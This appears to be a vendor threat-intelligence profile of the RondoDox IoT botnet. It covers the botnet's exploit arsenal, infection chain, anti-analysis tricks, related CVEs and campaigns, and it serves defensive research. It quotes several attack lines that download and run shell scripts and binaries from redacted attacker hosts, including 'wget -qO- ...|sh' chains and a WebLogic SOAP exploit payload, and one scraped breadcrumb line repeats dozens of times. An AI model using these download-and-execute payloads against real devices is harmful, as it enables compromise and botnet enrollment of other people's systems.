RondoDox is a Linux-focused IoT botnet and Mirai-derived malware family first observed in 2025. It is primarily associated with large-scale distributed denial-of-service operations, while later reporting also documented the deployment of XMRig cryptocurrency-mining payloads on compromised systems. The botnet targets internet-exposed Linux devices, especially IoT equipment, routers, network appliances, DVRs, cameras, and web-facing servers, and has also been observed probing enterprise-facing software and AI-related services.
RondoDox is notable for its unusually broad exploit arsenal. Researchers associated it with mass exploitation of well over one hundred vulnerabilities, including both long-known embedded-device flaws and newly disclosed remote code execution issues. Activity attributed to the botnet shows rapid weaponization of public proof-of-concept exploits and opportunistic scanning of exposed services at scale, with daily exploitation attempts reaching very high volumes. Campaign reporting indicates a shift over time from broad shotgun exploitation toward narrower use of newer or higher-value vulnerabilities.
Infection commonly begins with exploitation of a remote code execution or command-injection flaw that launches a shell command to retrieve and execute a first-stage script. That script is designed to be file-light, suppress output, identify a writable directory, remove competing malware, and fetch an architecture-appropriate payload. RondoDox supports numerous CPU architectures used across embedded Linux ecosystems. The malware incorporates anti-analysis and sanity checks, connects infected devices to command-and-control infrastructure, and establishes persistence on compromised hosts. Observed behavior also includes removal of rival infections and defensive controls, indicating competition for device access among botnet operators.
RondoDox has been described as a Mirai variant or Mirai-like botnet, but some reporting distinguishes it from classic Mirai by emphasizing its operational focus on denial-of-service activity rather than broader multifunction bot behavior. Separate observations also tie it to brute-force use of default passwords on exposed devices, especially in IoT environments. Infrastructure analysis has linked parts of its hosting and exploitation ecosystem to compromised residential systems and to infrastructure hosted in multiple countries, including Iranian-hosted infrastructure in some reporting. The botnet has been observed targeting sectors including government, finance, and industry when exploiting exposed enterprise systems, but its core victimology remains heavily concentrated on poorly secured Linux-based edge and IoT devices.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
49 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2025-62593 is a critical remote code execution vulnerability in Ray, a distributed computing framework widely used for Python and machine-learning workloads. The attack combines DNS rebinding with a flawed User-Agent-based browser check.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Most of November’s volume tracked to a single cluster we associate with RondoDox distribution. 76% of attempts (737 out of 969) matched the same delivery pattern... with payloads that fetch and execute a first-stage script... ( wget -qO- http://74.###.###.52/rondo.ame.sh ... ) | sh"
20 distinct techniques documented for this family, organized by ATT&CK tactic.
The content is a large CVE PoC table showing repeated HTTP/SOAP/XML requests exploiting internet-exposed services and devices, e.g. "CVE-2017-10271 POST /wls-wsat/CoordinatorPortType ... <string>(wget -qO- http://<REDACTED_IP>/rondo.xcw.sh||busybox wget -qO- http://<REDACTED_IP>/rondo.xcw.sh||curl -s http://<REDACTED_IP>/rondo.xcw.sh)|sh</string>" and many similar requests across routers, DVRs, web apps, and middleware.
At this point it will also set up its own persistence and drop and launch the XMRig miner
Many payloads invoke shell execution, e.g. "|sh", "/bin/bash -c \"wget -qO- http://<REDACTED_IP>/rondo.bash.sh|sh&\"", "require('child_process').exec(...)", and "java.lang.Runtime.getRuntime().exec(...)".
"RondoDox malware encodes its configuration data using a simple XOR obfuscation algorithm... decrypted using the hexadecimal key 0x21"
The table shows varied User-Agent strings and email-like identifiers such as "Mozilla/5.0 (bang2012@tutanota.de)", "Mozilla/5.0 (bang2012@protonmail.com)", and browser-like Chrome user agents.
It then attempts to remove other threats, both by checking specific file locations and by removing entries from the victim's crontabs.
The payloads repeatedly rely on native utilities such as "wget", "busybox wget", "curl", and shell interpreters already present on the target device.
Upon being launched, the main binary does some basic sanity checks for its name and arguments, as well as checks for anti-debug and anti-analysis.
This isn’t hypothetical — it’s the entire history of IoT botnets, from Mirai in 2016 through the Aisuru and RondoDox campaigns still running in 2025–2026, which scan the internet for devices with default passwords and enroll them automatically.
Likely usage of compromised residential IPs as hosting infrastructure
Repeated command strings download payloads from attacker infrastructure, e.g. "wget -qO- http://<REDACTED_IP>/rondo.rwx.sh|sh", "curl -s http://<REDACTED_IP>/rondo.whm.sh|sh", and "wget -O rondo http://<REDACTED_IP>/rondo.mips;chmod 777 rondo;./rondo netgear.mips;echo".
186 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
78 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A DDoS botnet whose operators were reported to have added exploitation of CVE-2025-62593 to their toolkit before public disclosure.
A sophisticated botnet observed targeting both enterprise and consumer systems, using staged infrastructure shifts, fileless payloads, broad header-based exploit delivery, and compromised residential routers for scanning and propagation.
IoT botnet campaign active in 2025–2026 that scans the internet for devices with default passwords and enrolls them automatically.
A botnet that exploits vulnerabilities in internet-facing devices, particularly Linux-based systems and older ASUS routers, to conduct denial-of-service attacks.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.